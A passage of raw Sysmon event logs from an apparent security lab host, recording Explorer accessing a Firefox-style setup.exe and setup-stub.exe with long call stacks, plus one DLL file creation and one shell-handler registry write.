ystem32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 11241100x800000000000000016432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:53.567{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\InvokeShellVerb.dll2021-01-18 13:59:53.567 13241300x800000000000000016431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.567{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500_Classes\*\shell\Firefox-308046B0AF4A39CB\ExplorerCommandHandler{90AA3A4E-1CBA-4233-B8BB-535773D48449} 10341000x800000000000000016430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+345c25(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll+79cb(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+345c25(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll+79cb(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+345c25(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll+79cb(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+345c25(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll+79cb(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+387643(wow64)|C:\Windows\System32\windows.storage.dll+382764(wow64)|C:\Windows\System32\SHELL32.dll+345ae4(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll+79cb(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+387643(wow64)|C:\Windows\System32\windows.storage.dll+382764(wow64)|C:\Windows\System32\SHELL32.dll+345ae4(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll+79cb(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+387643(wow64)|C:\Windows\System32\windows.storage.dll+382764(wow64) 10341000x800000000000000016423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d